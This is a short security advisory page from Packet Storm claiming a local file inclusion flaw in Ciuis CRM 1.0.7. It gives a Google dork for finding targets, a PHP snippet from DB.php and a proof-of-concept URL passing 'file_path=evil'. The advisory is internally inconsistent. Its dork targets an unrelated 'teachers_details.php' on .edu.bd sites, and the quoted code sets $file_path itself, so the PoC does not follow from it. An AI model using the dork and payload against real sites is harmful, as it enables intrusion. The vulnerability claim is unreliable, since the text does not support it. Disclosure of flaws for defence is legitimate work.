Lucene search

K
packetstormIndoushkaPACKETSTORM:173770
HistoryJul 27, 2023 - 12:00 a.m.

Ciuis CRM 1.0.7 Local File Inclusion

2023-07-2700:00:00
indoushka
packetstormsecurity.com
111
ciuis crm 1.0.7
lfi vulnerability
windows 10
file inclusion
mozilla firefox
google dork
database.php
security advisory
`====================================================================================================================================  
| # Title : Ciuis™ CRM v1.0.7 LFI Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |  
| # Vendor : https://codelist.cc/php-script/233000-ciuis-crm-v107.html |  
| # Dork : inurl:"teachers_details.php?teacher_ID" site:edu.bd |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine   
  
[+] infected file : ciuis\system\database\DB.php  
  
[+] line 57,58,63   
  
if ( ! file_exists($file_path = APPPATH.'config/'.ENVIRONMENT.'/database.php')  
&& ! file_exists($file_path = APPPATH.'config/database.php'))  
  
include($file_path);  
  
[+] http://127.0.0.1/system/database/DB.php?file_path=evil  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`